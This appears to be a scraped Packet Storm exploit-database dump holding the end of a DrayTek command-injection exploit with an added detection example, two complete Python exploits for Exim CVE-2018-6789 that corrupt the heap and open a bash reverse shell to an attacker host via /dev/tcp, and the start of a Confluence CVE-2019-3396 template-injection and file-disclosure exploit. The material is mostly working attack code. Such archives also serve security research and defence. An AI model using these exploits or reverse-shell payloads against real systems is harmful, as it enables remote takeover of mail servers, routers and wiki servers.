\nresp, err := http.PostForm(targetUrl+vulnerableFile , \nurl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} }) \n \nif err != nil{ \nfmt.Println(\"error connecting host\") \nos.Exit(-1) \n} \n \n \ndefer resp.Body.Close() \nbody, err := ioutil.ReadAll(resp.Body) \n \nif err != nil{ \nfmt.Println(\"error reading data\") \nos.Exit(-1) \n} \n \nfmt.Println(string(body)) \n \n} 
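The two things worth taking away from the DrayTek entry above are the injection shape (a single quote and a newline break out of the string the web CGI builds, and `${IFS}` stands in for spaces so the command survives tokenising) and the fact that the request body is a fixed, recognisable pattern. The following Go program is an added example written for this page; it is not part of 0xsha's exploit or the Packet Storm listing. It re-derives the `keyPath` value the exploit sends, and runs a defender-side check over two constructed request bodies (one benign login, one carrying the published payload) to flag the injection. The function names `buildKeyPath`, `isSuspiciousKeyPath` and `FlagLoginRequest`, the sample bodies and the shell-metacharacter list are all assumptions of this example, a generic heuristic rather than DrayTek's own fix; the real remediation remains the 1.5.1 firmware named above.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Shell metacharacters that have no business in a keyPath value. The
// published request abuses the single quote and the newline; the exploit
// above replaces spaces with ${IFS} so the command survives tokenising.
// This list is an assumption of the example, not the vendor's filter.
const shellMeta = "'\"`$;|&<>\n\r()"

// buildKeyPath re-derives the keyPath value the exploit sends for a given
// command: quote, newline, /bin/sh -c with the command, newline, quote,
// with every space replaced by ${IFS}.
func buildKeyPath(cmd string) string {
	payload := "'\n/bin/sh -c '" + cmd + "'\n'"
	return strings.ReplaceAll(payload, " ", "${IFS}")
}

// isSuspiciousKeyPath reports whether a decoded keyPath value carries the
// ${IFS} whitespace trick or any character from shellMeta.
func isSuspiciousKeyPath(v string) bool {
	if strings.Contains(v, "${IFS}") {
		return true
	}
	return strings.ContainsAny(v, shellMeta)
}

// FlagLoginRequest parses a form-encoded body posted to mainfunction.cgi
// and returns true when an action=login request has an injected keyPath.
// Requests to other paths or with other actions are not inspected.
func FlagLoginRequest(path, body string) (bool, error) {
	if path != "/cgi-bin/mainfunction.cgi" {
		return false, nil
	}
	form, err := url.ParseQuery(body)
	if err != nil {
		return false, err
	}
	if form.Get("action") != "login" {
		return false, nil
	}
	return isSuspiciousKeyPath(form.Get("keyPath")), nil
}

func main() {
	// Constructed sample bodies: a normal login and the body from the
	// advisory-style request quoted in the exploit header above.
	benign := "action=login&keyPath=&loginUser=admin&loginPwd=secret"
	malicious := "action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a"
	for _, b := range []string{benign, malicious} {
		hit, err := FlagLoginRequest("/cgi-bin/mainfunction.cgi", b)
		fmt.Printf("flagged=%v err=%v body=%q\n", hit, err, b)
	}
	// Show what the exploit would put on the wire for a chosen command.
	fmt.Println(url.QueryEscape(buildKeyPath("uname -a")))
}
```

Note that `url.ParseQuery` decodes `%27` and `%0A` back to the quote and newline before the check runs, which is why the detector looks at decoded values rather than the raw body; matching only on `%27%0A` would miss trivially re-encoded variants. A check like this belongs on a reverse proxy or in web-server log review in front of a device that cannot yet be upgraded; it is a stopgap, not a substitute for the firmware fix.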
\n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156979/draytek-exec.txt"}, {"lastseen": "2018-10-25T10:13:22", "description": "", "cvss3": {}, "published": "2018-10-24T00:00:00", "type": "packetstorm", "title": "Exim 4.90 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-6789"], "modified": "2018-10-24T00:00:00", "id": "PACKETSTORM:149926", "href": "https://packetstormsecurity.com/files/149926/Exim-4.90-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: exim 4.90 - Remote Code Execution \n# Date: 2018-10-24 \n# Exploit Author: hackk.gr \n# Vendor Homepage: exim.org \n# Version: exim < 4.90 \n# Tested on: debian exim 4.89, ubuntu exim 4.86_2 \n# CVE : CVE-2018-6789 \n \n#!/usr/bin/python \n#debian exim 4.89 \n#ubuntu exim 4.86_2 \nimport time \nimport socket \nimport struct \nimport os \nimport os.path \nimport sys \nimport ssl \nimport random \nfrom multiprocessing import Process, Queue \n \ns = None \nf = None \ntest = True \nrcpt_index_start = 0x120 \nbufsize = 8200 \n \ndef connect(host, port): \nglobal s \nglobal f \ns = socket.create_connection((host,port)) \nf = s.makefile(\"rw\", bufsize=0) \n \ndef p(v): \nreturn struct.pack(\"<Q\", v) \n \ndef readuntil(delim='\\n'): \ndata = '' \nauth_plain_available = False \nwhile True: \n \nl = f.readline() \nif l == \"\": \nreturn \"\" \n \nif l.find(\"PLAIN\") > -1: \nauth_plain_available = True \n \nif test: \nif len(l) > 70: \nsys.stdout.write(l[:70] + \" ...\\n\") \nsys.stdout.flush() \nelse: \nprint l.strip(\"\\r\").strip(\"\\n\") \n \ndata = data + l \nif data.find(delim) > -1: \nreturn data \nif l == \"\\n\" or l == \"\": \nreturn \"\" \nreturn data \n \ndef write(data): \nf.write(data + \"\\n\") \ndef ehlo(v): \nwrite(\"EHLO \" + v) \nreturn readuntil('HELP') \ndef unrec(v): \nwrite(v) \nreaduntil('command') \ndef auth_plain(v): \nencode = 
v.encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode) \nl = f.readline() \nif test: \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \ndef auth_plain1(v): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode) \nl = f.readline() \nif test: \nif l.find(\"Incorrect\") > -1: \nraise Exception(\"WRONG DRIVER\") \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \ndef auth_plain2(v,value): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nvalue = chr(value).encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode[:-1] + value) \nl = f.readline() \nif test: \nif l.find(\"Incorrect\") > -1: \nraise Exception(\"WRONG DRIVER\") \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \ndef one_byte_overwrite(): \nv = \"C\" * bufsize \nencode = v.encode('base64').replace('\\n','').replace('=','') \nencode = encode[:-1] + \"PE\" \nwrite(\"AUTH PLAIN \" + encode) \nl = f.readline() \nif test: \nif l.find(\"Incorrect\") > -1: \nraise Exception(\"WRONG DRIVER\") \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \n \nlookup_table = {0x00: [0,3], \n0x01: [0,7], \n0x02: [0,11], \n0x03: [0,15], \n0x04: [0,19], \n0x05: [0,23], \n0x06: [0,27], \n0x07: [0,31], \n0x08: [0,35], \n0x09: [0,39], \n0x0a: [0,43], \n0x0b: [0,47], \n0x0c: [0,51], \n0x0d: [0,55], \n0x0e: [0,59], \n0x0f: [0,63], \n0x10: [0,67], \n0x11: [0,71], \n0x12: [0,75], \n0x13: [0,79], \n0x14: [0,83], \n0x15: [0,87], \n0x16: [0,91], \n0x17: [0,95], \n0x18: [0,99], \n0x19: [0,103], \n0x1a: [0,107], \n0x1b: [0,111], \n0x1c: [0,115], \n0x1d: [0,119], \n0x1e: [0,123], \n0x1f: [0,127], \n0x20: [0,131], \n0x21: [0,135], \n0x22: [0,139], 
\n0x23: [0,143], \n0x24: [0,147], \n0x25: [0,151], \n0x26: [0,155], \n0x27: [0,159], \n0x28: [0,163], \n0x29: [0,167], \n0x2a: [0,171], \n0x2b: [0,175], \n0x2c: [0,179], \n0x2d: [0,183], \n0x2e: [0,187], \n0x2f: [0,191], \n0x30: [0,195], \n0x31: [0,199], \n0x32: [0,203], \n0x33: [0,207], \n0x34: [0,211], \n0x35: [0,215], \n0x36: [0,219], \n0x37: [0,223], \n0x38: [0,227], \n0x39: [0,231], \n0x3a: [0,235], \n0x3b: [0,239], \n0x3c: [0,243], \n0x3d: [0,247], \n0x3e: [0,251], \n0x3f: [0,254], \n0x40: [64,3], \n0x41: [64,7], \n0x42: [64,11], \n0x43: [64,15], \n0x44: [64,19], \n0x45: [64,23], \n0x46: [64,27], \n0x47: [64,31], \n0x48: [64,35], \n0x49: [64,39], \n0x4a: [64,43], \n0x4b: [64,47], \n0x4c: [64,51], \n0x4d: [64,55], \n0x4e: [64,59], \n0x4f: [64,63], \n0x50: [64,67], \n0x51: [64,71], \n0x52: [64,75], \n0x53: [64,79], \n0x54: [64,83], \n0x55: [64,87], \n0x56: [64,91], \n0x57: [64,95], \n0x58: [64,99], \n0x59: [64,103], \n0x5a: [64,107], \n0x5b: [64,111], \n0x5c: [64,115], \n0x5d: [64,119], \n0x5e: [64,123], \n0x5f: [64,127], \n0x60: [64,131], \n0x61: [64,135], \n0x62: [64,139], \n0x63: [64,143], \n0x64: [64,147], \n0x65: [64,151], \n0x66: [64,155], \n0x67: [64,159], \n0x68: [64,163], \n0x69: [64,167], \n0x6a: [64,171], \n0x6b: [64,175], \n0x6c: [64,179], \n0x6d: [64,183], \n0x6e: [64,187], \n0x6f: [64,191], \n0x70: [64,195], \n0x71: [64,199], \n0x72: [64,203], \n0x73: [64,207], \n0x74: [64,211], \n0x75: [64,215], \n0x76: [64,219], \n0x77: [64,223], \n0x78: [64,227], \n0x79: [64,231], \n0x7a: [64,235], \n0x7b: [64,239], \n0x7c: [64,243], \n0x7d: [64,247], \n0x7e: [64,251], \n0x7f: [64,254], \n0x80: [128,3], \n0x81: [128,7], \n0x82: [128,11], \n0x83: [128,15], \n0x84: [128,19], \n0x85: [128,23], \n0x86: [128,27], \n0x87: [128,31], \n0x88: [128,35], \n0x89: [128,39], \n0x8a: [128,43], \n0x8b: [128,47], \n0x8c: [128,51], \n0x8d: [128,55], \n0x8e: [128,59], \n0x8f: [128,63], \n0x90: [128,67], \n0x91: [128,71], \n0x92: [128,75], \n0x93: [128,79], \n0x94: [128,83], 
\n0x95: [128,87], \n0x96: [128,91], \n0x97: [128,95], \n0x98: [128,99], \n0x99: [128,103], \n0x9a: [128,107], \n0x9b: [128,111], \n0x9c: [128,115], \n0x9d: [128,119], \n0x9e: [128,123], \n0x9f: [128,127], \n0xa0: [128,131], \n0xa1: [128,135], \n0xa2: [128,139], \n0xa3: [128,143], \n0xa4: [128,147], \n0xa5: [128,151], \n0xa6: [128,155], \n0xa7: [128,159], \n0xa8: [128,163], \n0xa9: [128,167], \n0xaa: [128,171], \n0xab: [128,175], \n0xac: [128,179], \n0xad: [128,183], \n0xae: [128,187], \n0xaf: [128,191], \n0xb0: [128,195], \n0xb1: [128,199], \n0xb2: [128,203], \n0xb3: [128,207], \n0xb4: [128,211], \n0xb5: [128,215], \n0xb6: [128,219], \n0xb7: [128,223], \n0xb8: [128,227], \n0xb9: [128,231], \n0xba: [128,235], \n0xbb: [128,239], \n0xbc: [128,243], \n0xbd: [128,247], \n0xbe: [128,251], \n0xbf: [128,254], \n0xc0: [192,3], \n0xc1: [192,7], \n0xc2: [192,11], \n0xc3: [192,15], \n0xc4: [192,19], \n0xc5: [192,23], \n0xc6: [192,27], \n0xc7: [192,31], \n0xc8: [192,35], \n0xc9: [192,39], \n0xca: [192,43], \n0xcb: [192,47], \n0xcc: [192,51], \n0xcd: [192,55], \n0xce: [192,59], \n0xcf: [192,63], \n0xd0: [192,67], \n0xd1: [192,71], \n0xd2: [192,75], \n0xd3: [192,79], \n0xd4: [192,83], \n0xd5: [192,87], \n0xd6: [192,91], \n0xd7: [192,95], \n0xd8: [192,99], \n0xd9: [192,103], \n0xda: [192,107], \n0xdb: [192,111], \n0xdc: [192,115], \n0xdd: [192,119], \n0xde: [192,123], \n0xdf: [192,127], \n0xe0: [192,131], \n0xe1: [192,135], \n0xe2: [192,139], \n0xe3: [192,143], \n0xe4: [192,147], \n0xe5: [192,151], \n0xe6: [192,155], \n0xe7: [192,159], \n0xe8: [192,163], \n0xe9: [192,167], \n0xea: [192,171], \n0xeb: [192,175], \n0xec: [192,179], \n0xed: [192,183], \n0xee: [192,187], \n0xef: [192,191], \n0xf0: [192,195], \n0xf1: [192,199], \n0xf2: [192,203], \n0xf3: [192,207], \n0xf4: [192,211], \n0xf5: [192,215], \n0xf6: [192,219], \n0xf7: [192,223], \n0xf8: [192,227], \n0xf9: [192,231], \n0xfa: [192,235], \n0xfb: [192,239], \n0xfc: [192,243], \n0xfd: [192,247], \n0xfe: [192,251], \n0xff: 
[192,254], \n} \n \ndef exploit(b1, b2, b3, rcpt_index, target, cb, cbport): \nglobal s \nglobal f \n \n#if c % 0x50 == 0: \n# print \" byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x\" % (b1, b2, b3, rcpt_index) \n \ntry: \nconnect(target, 25) \nexcept: \nraise Exception(\"CONNECTION ERROR\") \n \nbanner = f.readline() \nif test: \nprint banner.strip(\"\\r\").strip(\"\\n\") \n \nehlo(\"A\" * 8000) \n \nehlo(\"B\" * 16) \n \nunrec(\"\\xff\" * 2000) \nehlo(\"D\" * bufsize) \none_byte_overwrite() \n \nfake_header = p(0) \nfake_header += p(0x1f51) \nres = auth_plain1(\"E\" * 176 + fake_header + \"E\" * (bufsize-176-len(fake_header))) \n \nres = ehlo(\"F\" * 16) \nif res == \"\": \nraise Exception(\"CRASHED\") \n \nunrec(\"\\xff\" * 2000) \nunrec(\"\\xff\" * 2000) \n \nfake_header = p(0x4110) \nfake_header += p(0x1f50) \nauth_plain(\"G\" * 176 + fake_header + \"G\" * (bufsize-176-len(fake_header))) \n \nauth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1]) \nres = ehlo(\"I\" * 16) \n \nif res == \"\": \ns.close() \nf.close() \nraise Exception(\"EHLO(I)\") \n \nacl_smtp_rcpt_offset = rcpt_index \nlocal_host = cb \nlocal_port = cbport \ncmd = \"/usr/bin/setsid /bin/bash -c \\\"/bin/bash --rcfile <(echo 'echo \" + \"0x%02x \" % b1 + \"0x%02x \" % b2 + \"0x%02x \" % b3 + \"0x%04x \" % rcpt_index + \"') -i >& /dev/tcp/\" + local_host + \"/\" + str(local_port) + \" 0>&1\\\"\" \ncmd_expansion_string = \"${run{\" + cmd + \"}}\\0\" \n \nauth_plain(\"J\" * acl_smtp_rcpt_offset + cmd_expansion_string + \"\\x00\")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string))) \n \nwrite(\"MAIL FROM:<postmaster@localhost>\") \n \nres = f.readline() \n \nif res != \"\": \nif test: \nraise Exception(\"NO TARGET\") \nraise Exception(\"OFFSET\") \n \nraise Exception(\"BYTE\") \n \nwrite(\"RCPT TO:<postmaster@localhost>\") \nreaduntil(\"Accepted\") \n \nwrite(\"RCPT TO:<postmaster@localhost>\") \nif f.readline() == \"\": 
\ns.close() \nf.close() \nraise Exception(\"RCPT TO\") \n \ndef checkvuln(host): \ntry: \nexploit(0xff, 0xff, 0xff, rcpt_index_start, host, \"127.0.0.1\", \"1337\") \nexcept Exception as e: \nprint e \nif str(e) == \"EHLO(I)\": \nreturn True \nreturn False \n \ndef _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q): \nif b1 > 0xff or b2 > 0xff or b3 > 0xff: \nq.put([b1,b2,b3,\"VALUE\"]) \nreturn \ntry: \nexploit(b1, b2, b3, rcpt_index, target, cb, cbport) \nexcept Exception as e: \ne = str(e) \nif e == \"[Errno 104] Connection reset by peer\" or e.find(\"EOF occurred\") > -1: \ne = \"BYTE\" \nq.put([b1,b2,b3,e]) \n \nif __name__ == '__main__': \nif len(sys.argv) < 4: \nprint \"%s <cb> <cbport> <target>\" % sys.argv[0] \nsys.exit(1) \n \ntarget = sys.argv[3] \ncb = sys.argv[1] \ncbport = sys.argv[2] \n \nif len(sys.argv) == 8: \nprint \"reuse fixed offsets\" \nb1 = int(sys.argv[4], 16) \nb2 = int(sys.argv[5], 16) \nb3 = int(sys.argv[6], 16) \nrcpt_index = int(sys.argv[7], 16) \n \ntry: \nexploit(b1, b2, b3, rcpt_index, target, cb, cbport) \nexcept Exception as e: \nprint e \nsys.exit(1) \n \nprint \"check vuln\" \nif not checkvuln(target): \nprint \"false\" \nsys.exit(1) \n \nprint \"true\" \ntest=False \n \nallbytes = [offset for offset in xrange(0, 0x110)] \nallbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)] \nb3_survived = [] \n \nb3_survived_stop = False \ntested = [] \ntry: \nq = Queue() \nprocs = [] \nprint \nprint \"Discover first byte in offset\" \nprint \nsys.stdout.write(\"Try Offsets %02x%02x%02x to %02x%02x%02x ...\" % (0x00,0xff,0xff,0xff,0xff,0xff)) \nfor b3 in allbytes: \nif b3 % 0x10 == 0 and b3 <= 0xff: \nsys.stdout.write(\"\\rTry Offsets %02x%02x%02x to %02x%02x%02x ...\" % (b3,0xff,0xff,0xff,0xff,0xff)) \n \nb1 = 0x00 \n \nfor b2 in allbytes_10: \nproc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) \nprocs.append(proc) \nproc.daemon = True \nproc.start() \n \nto_break = False \nif len(procs) 
== 16: \nfor i in xrange(0,16): \nresult = q.get() \nif result[3] == \"BYTE\": \nif [b3, b2] not in tested: \ntested.append([b3, b2]) \nb3_survived.append(result[2]) \nsys.stdout.write(\"\\nOffset %02x%02x%02x Survived ...\" % (result[2],result[1],result[0])) \nelse: \nto_break = True \n \nprocs[:] = [] \nif to_break: \nbreak \n \nprint \"\\n\" \nprint \"Discover offsets for rcpt index brute force ...\" \nprint \nb1_survived = {} \nfor b3 in b3_survived: \nfor b2 in allbytes: \nif b2 % 0x10 == 0 and b2 <= 0xff: \nsys.stdout.write(\"\\r\\r\\nTry Offsets %02x%02x%02x to %02x%02x%02x ... \" % (b3,b2,0x00,b3,0xff,0xf0)) \nfor b1 in allbytes_10: \nproc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) \nprocs.append(proc) \nproc.daemon = True \nproc.start() \n \nif len(procs) == 16: \nfor i in xrange(0,16): \nresult = q.get() \nif result[3] == \"OFFSET\": \nif result[2] not in b1_survived: \nb1_survived[result[2]] = [] \nb1_survived[result[2]].append(result) \nsys.stdout.write(\"\\n%02x%02x%02x Survived ...\" % (result[2],result[1],result[0])) \n \nprocs[:] = [] \n \niteration_list = [n for n in xrange(0x100,0x1000,0x10)] \niteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)] \n \nfor n in iteration_list2: \niteration_list.append(n) \n \nb1_survived_priority = [] \nb1_survived_additional = [] \n \nfor key in sorted(b1_survived): \nif len(b1_survived[key]) < 7: \nb1_survived_priority.append(b1_survived[key]) \nelse: \nb1_survived_additional.append(b1_survived[key]) \n \n_b1_survived = [] \nfor result in b1_survived_priority: \n_b1_survived.append(result) \nfor result in b1_survived_additional: \n_b1_survived.append(result) \n \nprint \"\\n\" \nprint \"Start rcpt index brute force ...\" \nprint \n \nfor result in _b1_survived: \nfor s in result: \nsys.stdout.write(\"\\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ...\" % (s[2],s[1],s[0])) \nfor rcpt_index in iteration_list: \nproc = Process(target=_exploit, 
args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q)) \nprocs.append(proc) \nproc.daemon = True \nproc.start() \n \nif len(procs) == 16: \nfor i in xrange(0,16): \nq.get() \n \nprocs[:] = [] \nexcept KeyboardInterrupt: \npass \n \nprint \"done.\" \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149926/exim490-exec.txt"}, {"lastseen": "2018-05-07T01:19:11", "description": "", "cvss3": {}, "published": "2018-05-03T00:00:00", "type": "packetstorm", "title": "Exim base64d Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-6789"], "modified": "2018-05-03T00:00:00", "id": "PACKETSTORM:147456", "href": "https://packetstormsecurity.com/files/147456/Exim-base64d-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nimport time \nimport socket \nimport struct \ns = None \nf = None \ndef logo(): \nprint \nprint \" CVE-2018-6789 Poc Exploit\" \nprint \"@straight_blast ; straightblast426@gmail.com\" \nprint \ndef connect(host, port): \nglobal s \nglobal f \ns = socket.create_connection((host,port)) \nf = s.makefile('rw', bufsize=0) \ndef p(v): \nreturn struct.pack(\"<Q\", v) \ndef readuntil(delim='\\n'): \ndata = '' \nwhile not data.endswith(delim): \ndata += f.read(1) \nreturn data \ndef write(data): \nf.write(data + \"\\n\") \ndef ehlo(v): \nwrite(\"EHLO \" + v) \nreaduntil('HELP') \ndef unrec(v): \nwrite(v) \nreaduntil('command') \ndef auth_plain(v): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode) \nreaduntil('data') \ndef one_byte_overwrite(): \nv = \"C\" * 8200 \nencode = v.encode('base64').replace('\\n','').replace('=','') \nencode = encode[:-1] + \"PE\" \nwrite(\"AUTH PLAIN \" + encode) \nreaduntil('data') \ndef exploit(): \nlogo() \nconnect('localhost', 25) \nprint \"[1] connected to target\" \ntime.sleep(0.5) \n \nehlo(\"A\" * 8000) \nehlo(\"B\" * 
16) \nprint \"[2] created free chunk size 0x6060 in unsorted bin\" \n \nunrec(\"\\xff\" * 2000) \nehlo(\"D\" * 8200) \none_byte_overwrite() \nprint \"[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0\" \n \nfake_header = p(0) \nfake_header += p(0x1f51) \nauth_plain(\"E\" * 176 + fake_header + \"E\" * (8200-176-len(fake_header))) \nprint \"[4] patched chunk with fake header so extended chunk can be freed\" \n \nehlo(\"F\" * 16) \nprint \"[5] freed extended chunk\" \n \nunrec(\"\\xff\" * 2000) \nunrec(\"\\xff\" * 2000) \nprint \"[6] occupied 1st and 3rd item in unsorted bin with fillers\" \n \nfake_header = p(0x4110) \nfake_header += p(0x1f50) \nauth_plain(\"G\" * 176 + fake_header + \"G\" * (8200-176-len(fake_header))) \nprint \"[7] patched chunk with fake header so extended chunk can be allocated\" \n \naddress = 0x55d7e5864480 \nauth_plain(\"H\" * 8200 + p(0x2021) + p(address) + p(0x2008) + \"H\" * 184) \nprint \"[8] overwrite 'next' pointer with ACL store block address\" \n \nehlo(\"I\" * 16) \nprint \"[9] freed the ACL store block\" \n \nacl_smtp_rcpt_offset = 288 \nlocal_host = '192.168.0.159' \nlocal_port = 1337 \ncmd = \"/bin/bash -c \\\"/bin/bash -i >& /dev/tcp/\" + local_host + \"/\" + str(local_port) + \" 0>&1\\\"\" \ncmd_expansion_string = \"${run{\" + cmd + \"}}\\0\" \nauth_plain(\"J\" * acl_smtp_rcpt_offset + cmd_expansion_string + \"J\" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) \nprint \"[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression\" \n \nwrite(\"MAIL FROM:<test@pwned.com>\") \nreaduntil(\"OK\") \nwrite(\"RCPT TO:<shell@pwned.com>\") \nprint \"[11] triggered RCPT TO and executing shell expression ... 
enjoy your shell!\" \nprint \nif __name__ == '__main__': \nexploit() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147456/eximbase64d-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-22T15:47:25", "description": "", "cvss3": {}, "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian \nConfluence Server server-side template injection. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile the Metasploit module works perfectly fine, it has a limitation: to gain RCE, an outbound FTP request is made \nfrom the target Confluence server towards the attacker's server where the Velocity template with the payload is \nhosted. If this is not possible, for example because the network where the target Confluence server is located filters all \noutbound traffic, an alternative approach is needed. This exploit, in addition to the original exploit, implements this \nalternative approach by first uploading the template to the server and then loading it with the original vulnerability from \nthe local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any \nuser can upload a file to the server by attaching the file to their \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. \n \nIn case the network is filtered and loading a remote template is not possible, and you also do not have a low-privileged \nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode \nof this exploit. Conveniently, the application returns file content as well as directory listings depending on what the path \npoints to. As in the original exploit, no authentication is needed for this mode. \n \nLimitations of the path traversal exploit: \n- not possible to distinguish between a non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you have the ability to authenticate to the server and have enough privileges to upload files, use the second mode. A \nregular user probably has enough privileges for this since each user can have their own personal space where they \nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not \nexist, and attaches a file with the Velocity template payload. It then uses the original vulnerability but loads the template file \nwith the payload from the local filesystem instead of from the remote system. 
\n \nPrerequisite of RCE in this exploit: \n- authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode \nto find it, should be in Confluence install directory under ./attachments subdirectory \n \nUsage \n- list /etc folder on Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get content of /etc/passwd on same server but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using \nexisting session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download Confluence trial version for version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser \nnetwork tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and \nchange the version in URL to be 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure initial installation, when you get to license window copy the server ID. \n4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. \n5. Activate the license and finish the installation with default options. \n6. 
Create a user and login with him to go through initial user setup and get the session id for RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. 
